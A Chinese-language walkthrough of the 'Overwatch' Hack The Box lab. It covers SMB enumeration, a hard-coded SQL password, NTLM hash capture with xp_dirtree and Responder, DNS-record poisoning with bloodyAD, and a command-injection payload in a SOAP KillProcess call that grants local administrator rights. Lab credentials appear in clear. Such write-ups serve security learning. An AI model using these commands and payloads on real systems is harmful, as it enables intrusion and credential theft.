本文介绍了如何在Windows环境中进行渗透测试,特别是针对名为“Overwatch”的Windows域控制器。通过信息收集、SMB枚举和Kerberoasting等步骤,测试人员发现了服务账户sqlsvc及其相关凭据。利用这些凭据,测试人员尝试进行攻击,包括DNS投毒和利用暴露的Web服务接口来执行命令,最终成功提升权限并获取管理员访问权限。文章总结了测试过程中的关键学习点和工具的使用方法。
Information Gathering
# Nmap 7.98 scan initiated Tue Jan 27 16:43:09 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.182.219
Nmap scan report for 10.129.182.219
Host is up (0.15s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-27 16:44:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-27T16:45:01+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after: 2026-06-08T15:16:06
| MD5: 0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
| SHA-1: 3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
|_SHA-256: b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/27%Time=6978EB57%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.312 days (since Mon Jan 26 09:15:07 2026)
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-time:
| date: 2026-01-27T16:44:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 27 16:45:05 2026 -- 1 IP address (1 host up) scanned in 116.34 seconds这台目标主机(IP: 10.129.182.219)是一台典型的 Windows 域控制器 (Domain Controller, DC)。
- 操作系统 (Operating System): Windows Server (极大可能是 Windows Server 2019 或 2022)。
- 域名 (Domain Name):
overwatch.htb - 主机名 (Hostname):
S200401 - 角色 (Role): 域控制器 (Domain Controller),因为它运行着 Kerberos 和 LDAP 服务。
SMB枚举
➜ Overwatch nxc smb 10.129.77.116 -u "guest" -p "" --shares
SMB 10.129.77.116 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB 10.129.77.116 445 S200401 [+] overwatch.htb\guest:
SMB 10.129.77.116 445 S200401 [*] Enumerated shares
SMB 10.129.77.116 445 S200401 Share Permissions Remark
SMB 10.129.77.116 445 S200401 ----- ----------- ------
SMB 10.129.77.116 445 S200401 ADMIN$ Remote Admin
SMB 10.129.77.116 445 S200401 C$ Default share
SMB 10.129.77.116 445 S200401 IPC$ READ Remote IPC
SMB 10.129.77.116 445 S200401 NETLOGON Logon server share
SMB 10.129.77.116 445 S200401 software$ READ
SMB 10.129.77.116 445 S200401 SYSVOL Logon server share在software$发现overwatch.exe.config,其中含有
- 隐藏服务端口http://overwatch.htb:8000/MonitorService
- WSDL 可见:
httpGetEnabled="True"表示我们可以通过浏览器或工具访问http://overwatch.htb:8000/MonitorService?wsdl来获取服务的接口定义(就像 API 文档一样)。 - 调试模式开启:
includeExceptionDetailInFaults="True"表示如果我们在与服务交互时触发报错,服务器会返回详细的堆栈信息,这对利用漏洞非常有帮助。
将文件下载到本地
prompt off
mget overwatch.exe overwatch.exe.config overwatch.pdb System.Data.SQLite.dll EntityFramework.dll简单进行逆向分析
➜ Overwatch strings -e l overwatch.exe | grep -i "pass"
Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;验证用户有效性sqlsvc:TI0LKcfHzZw1Vv
➜ Overwatch nxc smb 10.129.77.116 -u sqlsvc -p 'TI0LKcfHzZw1Vv' --shares
SMB 10.129.77.116 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB 10.129.77.116 445 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB 10.129.77.116 445 S200401 [*] Enumerated shares
SMB 10.129.77.116 445 S200401 Share Permissions Remark
SMB 10.129.77.116 445 S200401 ----- ----------- ------
SMB 10.129.77.116 445 S200401 ADMIN$ Remote Admin执行 Kerberoasting
sqlsvc是一个服务账号,我们可以执行 Kerberoasting
# 语法说明:
# -request: 请求 TGS 票据
# -dc-ip: 指定域控 IP
# -outputfile: 将抓取到的哈希保存到文件中
impacket-GetUserSPNs overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv -dc-ip 10.129.77.116 -request -outputfile hashes.kerberoast
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
No entries found!这条路走不通
执行bloodhound
# 采集域数据
bloodhound-python -u sqlsvc -p 'TI0LKcfHzZw1Vv' -d overwatch.htb -c All -ns 10.129.77.116 -dc overwatch.htb --zip没发现有趣的东西
执行全端扫描
# Nmap 7.98 scan initiated Thu Jan 29 18:59:58 2026 as: /usr/lib/nmap/nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,6520,9389,49664,49669,50263,50264,59056,59317 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.83
Nmap scan report for 10.129.7.83
Host is up (0.36s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-29 19:00:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-29T19:01:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-29T19:01:02+00:00
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after: 2026-06-08T15:16:06
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.7.83:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
| ms-sql-ntlm-info:
| 10.129.7.83:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
|_ssl-date: 2026-01-29T19:01:42+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-29T18:33:05
|_Not valid after: 2056-01-29T18:33:05
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
50263/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
50264/tcp open msrpc Microsoft Windows RPC
59056/tcp open msrpc Microsoft Windows RPC
59317/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/29%Time=697BAE3C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-29T19:01:03
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 29 19:01:52 2026 -- 1 IP address (1 host up) scanned in 114.14 seconds发现非标准sql端口:6520
impacket-mssqlclient overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv@10.129.7.83 -windows-auth -p 6520成功登录
进行中继攻击
kali监听
sudo responder -I tun0mssql中
xp_dirtree \\10.10.16.219\share得到OVERWATCH\S200401$的hash(这是电脑的,很难破解),尝试破解没有结果
枚举链接服务器
enum_links发现SQL07
SQL (OVERWATCH\sqlsvc dbo@overwatch)> use_link SQL07
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64].这个错误的可能原因:
- 目标找不到SQL07对应的ip地址
- 目标服务器没开(没开就看不到SQL07)
Exploitation (User Flag)
为了利用此漏洞我们可以:
添加恶意 DNS 记录(SQL07指向攻击机IP)->进行投毒->窃取hash破解查看sqlsvc权限
bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv get writabledistinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE
distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD
distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD可以看到sqlsvc对DomainDnsZones有CREATE_CHILD权限
添加恶意DNS记录
bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.16.219
[+] SQL07 has been successfully added执行身份验证
SQL (OVERWATCH\sqlsvc guest@master)> SELECT * FROM OPENQUERY(SQL07,'SELECT @@VERSION')
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.responder得到硬编码凭据sqlmgmt:bIhBbzMMnB82yx
evil-winrm -i 10.129.8.197 -u sqlmgmt -p 'bIhBbzMMnB82yx'连接成功
Privilege Escalation (Root Flag)
之前有一个overwatch.exe程序
(curl http://localhost:8000/MonitorService?xsd=xsd0 -UseBasicParsing).Content
<?xml version="1.0" encoding="utf-8"?><xs:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://tempuri.org/"><xs:element name="StartMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element><xs:element name="StartMonitoringResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="StartMonitoringResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="StopMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element><xs:element name="StopMonitoringResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="StopMonitoringResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="KillProcess"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="processName" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="KillProcessResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="KillProcessResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element></xs:schema>通过 xsd=xsd0 的输出,我们清楚地看到了服务暴露的方法:
StartMonitoring(无参数)StopMonitoring(无参数)KillProcess(参数:processName, 类型:string)
使用dnSpy反编译程序
public string KillProcess(string processName)
{
string scriptContents = "Stop-Process -Name " + processName + " -Force";
string result;
try
{
using (Runspace runspace = RunspaceFactory.CreateRunspace())
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
pipeline.Commands.AddScript(scriptContents);
pipeline.Commands.Add("Out-String");
Collection<PSObject> collection = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject psobject in collection)
{
stringBuilder.AppendLine(psobject.ToString());
}
result = stringBuilder.ToString();
}
}
}$ws = New-WebServiceProxy -Uri "http://localhost:8000/MonitorService?wsdl"
$ws.KillProcess("notepad; net localgroup administrators sqlmgmt /add; #")
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
sqlmgmt
The command completed successfully.退出重新登陆即可
Lessons Learned
wsdl:https://www.ibm.com/docs/zh-tw/app-connect/11.0.0?topic=overview-querying-wsdl-wsdl
soap:https://www.runoob.com/soap/soap-syntax.html